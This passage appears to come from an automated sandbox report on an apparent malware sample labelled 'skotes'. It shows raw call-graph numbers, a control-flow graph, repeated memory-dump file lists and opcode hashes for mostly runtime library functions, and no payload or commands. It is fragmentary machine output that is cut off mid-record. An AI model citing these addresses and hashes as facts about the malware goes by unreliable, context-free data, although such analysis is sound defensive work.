API calls 37468->37470 37469->37463 37469->37468 37471 484df7 37470->37471 37472 487a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37471->37472 37473 484e0c 37472->37473 37474 487a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37473->37474 37475 484e27 37474->37475 37476 475c10 5 API calls 37475->37476 37477 484e2e 37476->37477 37478 4880c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37477->37478 37479 484e67 37478->37479 37511 484390 37479->37511 37482 47be82 37481->37482 37483 47c281 37481->37483 37482->37483 37487 47be96 37482->37487 37484 4880c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37483->37484 37485 47c22e _Ref_count_obj 37484->37485 37486 47c27c __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z _Ref_count_obj 37485->37486 37488 4a6c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37485->37488 37486->37386 37490 487a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37487->37490 37489 47c354 37488->37489 37491 47bf18 37490->37491 37492 475c10 5 API calls 37491->37492 37495 47bf23 _Ref_count_obj 37492->37495 37493 487a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37494 47bfb4 37493->37494 37496 475c10 5 API calls 37494->37496 37495->37493 37497 47bfbf 37496->37497 37498 487a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37497->37498 37499 47bfd8 37498->37499 37500 475c10 5 API calls 37499->37500 37501 47bfe3 __InternalCxxFrameHandler _Ref_count_obj 37500->37501 37504 4786a0 _Ref_count_obj 37502->37504 37510 4785d5 _Ref_count_obj 37502->37510 37503 478767 37543 488200 RtlAllocateHeap RtlAllocateHeap 37503->37543 37507 478740 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z _Ref_count_obj 37504->37507 37508 4a6c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37504->37508 37505 4880c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37505->37510 37507->37394 37509 478771 37508->37509 37510->37503 37510->37504 37510->37505 37512 487a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37511->37512 37513 4843d2 37512->37513 37514 487a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37513->37514 37515 4843e4 37514->37515 37516 478580 2 API calls 37515->37516 37517 4843ed 37516->37517 37518 484646 37517->37518 37528 4843f8 _Ref_count_obj 37517->37528 37519 487a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37518->37519 37520 484657 37519->37520 37521 487a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37520->37521 37523 48466c 37521->37523 37522 4880c0 RtlAllocateHeap RtlAllocateHeap Concurrency::details::_CancellationTokenState::_RegisterCallback 37522->37528 37524 487a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37523->37524 37526 484610 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z _Ref_count_obj 37524->37526 37525 489280 2 API calls 37525->37528 37526->37426 37527 487a00 RtlAllocateHeap RtlAllocateHeap Concurrency::details::_CancellationTokenState::_RegisterCallback 37527->37528 37528->37522 37528->37525 37528->37526 37528->37527 37530 487a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37529->37530 37531 47991e 37530->37531 37532 475c10 5 API calls 37531->37532 37534 479927 Concurrency::details::QuickBitSet::QuickBitSet 37532->37534 37533 4799c6 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z _Ref_count_obj 37533->37450 37534->37533 37535 4a6c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37534->37535 37536 4799f2 37535->37536 37538 4a8ad1 37537->37538 37544 4a8868 37538->37544 37542->37455 37562 4a868d 37544->37562 37546 4a88b3 37547 4a690a __cftof 3 API calls 37546->37547 37554 4a88bf 37547->37554 37548 4a887a 37548->37546 37549 4a888f 37548->37549 37560 4a889f 37548->37560 37550 4a75f6 __dosmaperr RtlAllocateHeap 37549->37550 37551 4a8894 37550->37551 37569 4a6c5a RtlAllocateHeap __cftof 37551->37569 37555 4a88ee 37554->37555 37570 4a6d52 4 API calls 2 library calls 37554->37570 37558 4a8958 37555->37558 37571 4a8a8d RtlAllocateHeap __cftof __dosmaperr 37555->37571 37572 4a8a8d RtlAllocateHeap __cftof __dosmaperr 37558->37572 37559 4a8a20 37559->37560 37561 4a75f6 __dosmaperr RtlAllocateHeap 37559->37561 37560->37461 37561->37560 37563 4a8692 37562->37563 37564 4a86a5 37562->37564 37565 4a75f6 __dosmaperr RtlAllocateHeap 37563->37565 37564->37548 37566 4a8697 37565->37566 37573 4a6c5a RtlAllocateHeap __cftof 37566->37573 37568 4a86a2 37568->37548 37569->37560 37570->37554 37571->37558 37572->37559 37573->37568 37574 4aac53 37579 4aaa29 37574->37579 37577 4aac92 37580 4aaa48 37579->37580 37581 4aaa5b 37580->37581 37588 4aaa70 37580->37588 37582 4a75f6 __dosmaperr RtlAllocateHeap 37581->37582 37583 4aaa60 37582->37583 37599 4a6c5a RtlAllocateHeap __cftof 37583->37599 37585 4aaa6b 37585->37577 37596 4b1a9c 37585->37596 37586 4a75f6 __dosmaperr RtlAllocateHeap 37587 4aac41 37586->37587 37603 4a6c5a RtlAllocateHeap __cftof 37587->37603 37594 4aab90 37588->37594 37600 4b132b GetPEB GetPEB RtlAllocateHeap __cftof __dosmaperr 37588->37600 37591 4aabe0 37591->37594 37601 4b132b GetPEB GetPEB RtlAllocateHeap __cftof __dosmaperr 37591->37601 37593 4aabfe 37593->37594 37602 4b132b GetPEB GetPEB RtlAllocateHeap __cftof __dosmaperr 37593->37602 37594->37585 37594->37586 37604 4b1461 37596->37604 37598 4b1ab7 37598->37577 37599->37585 37600->37591 37601->37593 37602->37594 37603->37585 37607 4b146d ___scrt_is_nonwritable_in_current_image 37604->37607 37605 4b1474 37606 4a75f6 __dosmaperr RtlAllocateHeap 37605->37606 37608 4b1479 37606->37608 37607->37605 37609 4b149f 37607->37609 37622 4a6c5a RtlAllocateHeap __cftof 37608->37622 37613 4b1a2e 37609->37613 37612 4b1483 __wsopen_s 37612->37598 37614 4a698d __wsopen_s 3 API calls 37613->37614 37615 4b1a50 37614->37615 37616 4a68ed __wsopen_s 2 API calls 37615->37616 37617 4b1a5d 37616->37617 37619 4b1a64 37617->37619 37623 4b1abc 37617->37623 37620 4b1a96 37619->37620 37621 4aadf5 ___free_lconv_mon RtlAllocateHeap 37619->37621 37620->37612 37621->37620 37622->37612 37659 4b180a 37623->37659 37625 4b1ad9 37626 4b1aee 37625->37626 37627 4b1b07 37625->37627 37677 4a75e3 RtlAllocateHeap __dosmaperr 37626->37677 37673 4abf3a 37627->37673 37630 4b1b0c 37631 4b1b15 37630->37631 37638 4b1b2c __wsopen_s 37630->37638 37678 4a75e3 RtlAllocateHeap __dosmaperr 37631->37678 37632 4a75f6 __dosmaperr RtlAllocateHeap 37654 4b1b00 37632->37654 37634 4b1b1a 37636 4a75f6 __dosmaperr RtlAllocateHeap 37634->37636 37635 4b1be2 37639 4b1bed 37635->37639 37640 4b1c34 37635->37640 37652 4b1af3 37636->37652 37637 4b1bb7 37679 4a75c0 RtlAllocateHeap __dosmaperr 37637->37679 37638->37635 37638->37637 37680 4a75c0 RtlAllocateHeap __dosmaperr 37639->37680 37681 4abe85 RtlAllocateHeap __dosmaperr __wsopen_s 37640->37681 37644 4b1bfb 37651 4a75f6 __dosmaperr RtlAllocateHeap 37644->37651 37644->37652 37645 4b1c55 37646 4b1ca1 37645->37646 37682 4b1984 4 API calls 2 library calls 37645->37682 37650 4b1ca8 37646->37650 37684 4b1522 4 API calls 3 library calls 37646->37684 37649 4b1cd6 37649->37650 37655 4b1ce4 __wsopen_s 37649->37655 37683 4aaf48 RtlAllocateHeap __dosmaperr __wsopen_s 37650->37683 37651->37652 37652->37632 37654->37619 37655->37654 37685 4a75c0 RtlAllocateHeap __dosmaperr 37655->37685 37657 4b1da1 37686 4ac04d RtlAllocateHeap __dosmaperr __wsopen_s 37657->37686 37660 4b182b 37659->37660 37665 4b1845 37659->37665 37662 4a75f6 __dosmaperr RtlAllocateHeap 37660->37662 37660->37665 37663 4b183a 37662->37663 37694 4a6c5a RtlAllocateHeap __cftof 37663->37694 37687 4b179a 37665->37687 37666 4b18ac 37672 4b18fa __cftof 37666->37672 37696 4a9b60 RtlAllocateHeap __cftof __dosmaperr 37666->37696 37667 4b187d 37667->37666 37669 4a75f6 __dosmaperr RtlAllocateHeap 37667->37669 37670 4b18a1 37669->37670 37695 4a6c5a RtlAllocateHeap __cftof 37670->37695 37672->37625 37674 4abf46 ___scrt_is_nonwritable_in_current_image CallUnexpected 37673->37674 37676 4abf77 __wsopen_s 37674->37676 37698 4abd14 RtlAllocateHeap __dosmaperr ___free_lconv_mon __wsopen_s 37674->37698 37676->37630 37677->37652 37678->37634 37679->37652 37680->37644 37681->37645 37682->37646 37683->37654 37684->37649 37685->37657 37686->37654 37689 4b17b2 37687->37689 37688 4b17cd 37688->37667 37689->37688 37690 4a75f6 __dosmaperr RtlAllocateHeap 37689->37690 37691 4b17f1 37690->37691 37697 4a6c5a RtlAllocateHeap __cftof 37691->37697 37693 4b17fc 37693->37667 37694->37665 37695->37666 37696->37672 37697->37693 37698->37676 37699 479cda 37700 479ce2 _Ref_count_obj 37699->37700 37701 479db5 _Ref_count_obj 37700->37701 37702 47a921 37700->37702 37705 4880c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37701->37705 37703 47a953 37702->37703 37704 4a6c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37702->37704 37707 47a9a7 37703->37707 37710 4a6629 GetPEB GetPEB RtlAllocateHeap CallUnexpected 37703->37710 37704->37703 37706 47a903 37705->37706 37709 47a9b0 37710->37709 37711 47a079 37712 47a081 _Ref_count_obj 37711->37712 37713 47a930 37712->37713 37714 47a154 _Ref_count_obj 37712->37714 37715 4a6c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37713->37715 37716 4880c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37714->37716 37718 47a953 37715->37718 37717 47a903 37716->37717 37719 47a9a7 37718->37719 37722 4a6629 GetPEB GetPEB RtlAllocateHeap CallUnexpected 37718->37722 37721 47a9b0 37722->37721 37723 47a418 37724 47a420 _Ref_count_obj 37723->37724 37725 47a93f 37724->37725 37727 47a4f3 _Ref_count_obj 37724->37727 37726 4a6c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37725->37726 37728 47a944 37726->37728 37729 4880c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37727->37729 37730 4a6c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37728->37730 37731 47a903 37729->37731 37732 47a949 37730->37732 37733 4a6c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37732->37733 37734 47a94e 37733->37734 37735 4a6c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37734->37735 37737 47a953 37734->37737 37735->37737 37736 47a9a7 37737->37736 37740 4a6629 GetPEB GetPEB RtlAllocateHeap CallUnexpected 37737->37740 37739 47a9b0 37740->37739

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 1356 4b1abc-4b1aec call 4b180a 1359 4b1aee-4b1af9 call 4a75e3 1356->1359 1360 4b1b07-4b1b13 call 4abf3a 1356->1360 1365 4b1afb-4b1b02 call 4a75f6 1359->1365 1366 4b1b2c-4b1b75 call 4b1775 1360->1366 1367 4b1b15-4b1b2a call 4a75e3 call 4a75f6 1360->1367 1376 4b1de1-4b1de5 1365->1376 1374 4b1be2 1366->1374 1375 4b1b77-4b1b80 1366->1375 1367->1365 1382 4b1be8-4b1beb 1374->1382 1378 4b1b82-4b1b86 1375->1378 1379 4b1bb7-4b1bdd call 4a75c0 1375->1379 1378->1379 1381 4b1b88-4b1bb5 call 4b1775 1378->1381 1379->1365 1381->1374 1381->1379 1385 4b1bed-4b1c1e call 4a75c0 1382->1385 1386 4b1c34-4b1c37 1382->1386 1385->1365 1405 4b1c24-4b1c2f call 4a75f6 1385->1405 1389 4b1c39-4b1c3e 1386->1389 1390 4b1c40-4b1c46 1386->1390 1393 4b1c4a-4b1c98 call 4abe85 1389->1393 1390->1393 1394 4b1c48 1390->1394 1399 4b1c9a-4b1ca6 call 4b1984 1393->1399 1400 4b1cb7-4b1cdf call 4b1522 1393->1400 1394->1393 1399->1400 1407 4b1ca8 1399->1407 1409 4b1ce1-4b1ce2 1400->1409 1410 4b1ce4-4b1d25 1400->1410 1405->1365 1411 4b1caa-4b1cb2 call 4aaf48 1407->1411 1409->1411 1413 4b1d27-4b1d2b 1410->1413 1414 4b1d46-4b1d54 1410->1414 1411->1376 1413->1414 1416 4b1d2d-4b1d41 1413->1416 1417 4b1d5a-4b1d5e 1414->1417 1418 4b1ddf 1414->1418 1416->1414 1417->1418 1420 4b1d60-4b1d93 call 4b1775 1417->1420 1418->1376 1424 4b1dc7-4b1ddb 1420->1424 1425 4b1d95-4b1dc1 call 4a75c0 call 4ac04d 1420->1425 1424->1418 1425->1424
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.4624259952.0000000000471000.00000040.00000001.01000000.00000007.sdmp, Offset: 00470000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624147168.0000000000470000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624259952.00000000004D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624511254.00000000004D9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624594687.00000000004DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624789259.00000000004E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4626878493.0000000000644000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4626956652.0000000000646000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627111618.0000000000660000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627215025.0000000000662000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627263512.0000000000664000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627263512.000000000066D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627520705.0000000000671000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627621521.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627795067.0000000000673000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628081596.0000000000674000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628191632.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628280582.0000000000677000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628504116.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628612592.0000000000688000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628688890.0000000000690000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4629741634.0000000000691000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4630340866.000000000069B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4631260053.00000000006B0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632026108.00000000006B1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632624441.00000000006B3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632738173.00000000006CE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632893651.00000000006D0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632946339.00000000006D7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633135207.00000000006D9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633271692.00000000006DA000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633339364.00000000006DE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633438688.00000000006DF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4634528753.00000000006E4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4635382014.00000000006EC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4636770932.00000000006ED000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4638489368.00000000006F5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4639417984.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4640384962.000000000070B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4642083004.000000000070D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4644899265.0000000000723000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646300218.0000000000729000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646300218.0000000000748000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646671040.0000000000775000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646742452.0000000000776000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646878563.0000000000777000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646993632.000000000077D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4647248792.000000000077F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4647997205.000000000078D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4650697073.000000000078F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_470000_skotes.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: __dosmaperr
                                                                                                                                                                                                                                                  • String ID: H
                                                                                                                                                                                                                                                  • API String ID: 2332233096-2852464175
                                                                                                                                                                                                                                                  • Opcode ID: 4bf58a6a0a07ae052df7f1cf99cb2191b0c4490650b54f70131954ac3993e934
                                                                                                                                                                                                                                                  • Instruction ID: 33cfd5b89d320b91a3b1702932c84ebd1af2035f95325c254f2ad637c9304ef6
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4bf58a6a0a07ae052df7f1cf99cb2191b0c4490650b54f70131954ac3993e934
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BDA10732A041489FCF19DF68CC61BEE3BB1AB07324F64415FE811AB3E1D6399912C769
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • __dosmaperr.LIBCMT ref: 004A70C5
                                                                                                                                                                                                                                                    • Part of subcall function 004A732A: __dosmaperr.LIBCMT ref: 004A735F
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.4624259952.0000000000471000.00000040.00000001.01000000.00000007.sdmp, Offset: 00470000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624147168.0000000000470000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624259952.00000000004D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624511254.00000000004D9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624594687.00000000004DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624789259.00000000004E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4626878493.0000000000644000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4626956652.0000000000646000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627111618.0000000000660000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627215025.0000000000662000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627263512.0000000000664000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627263512.000000000066D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627520705.0000000000671000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627621521.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627795067.0000000000673000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628081596.0000000000674000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628191632.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628280582.0000000000677000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628504116.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628612592.0000000000688000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628688890.0000000000690000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4629741634.0000000000691000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4630340866.000000000069B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4631260053.00000000006B0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632026108.00000000006B1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632624441.00000000006B3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632738173.00000000006CE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632893651.00000000006D0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632946339.00000000006D7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633135207.00000000006D9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633271692.00000000006DA000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633339364.00000000006DE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633438688.00000000006DF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4634528753.00000000006E4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4635382014.00000000006EC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4636770932.00000000006ED000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4638489368.00000000006F5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4639417984.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4640384962.000000000070B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4642083004.000000000070D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4644899265.0000000000723000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646300218.0000000000729000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646300218.0000000000748000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646671040.0000000000775000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646742452.0000000000776000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646878563.0000000000777000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646993632.000000000077D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4647248792.000000000077F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4647997205.000000000078D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4650697073.000000000078F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_470000_skotes.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: __dosmaperr
                                                                                                                                                                                                                                                  • String ID: nJ
                                                                                                                                                                                                                                                  • API String ID: 2332233096-2303097403
                                                                                                                                                                                                                                                  • Opcode ID: 0edadafe63efc1a6ffbcf0a15fd7bf3c00b14e97fea9e4efd117c5976bd6a99b
                                                                                                                                                                                                                                                  • Instruction ID: fc62a6e6719dee2b5ce3a1676dc736a473a1c61b84deb1628b9d760dacca83e1
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0edadafe63efc1a6ffbcf0a15fd7bf3c00b14e97fea9e4efd117c5976bd6a99b
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 50418D71904204ABCB34EFB6DC459AFBBF9EF9A300B10442EF956D3311E6389940CB69
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
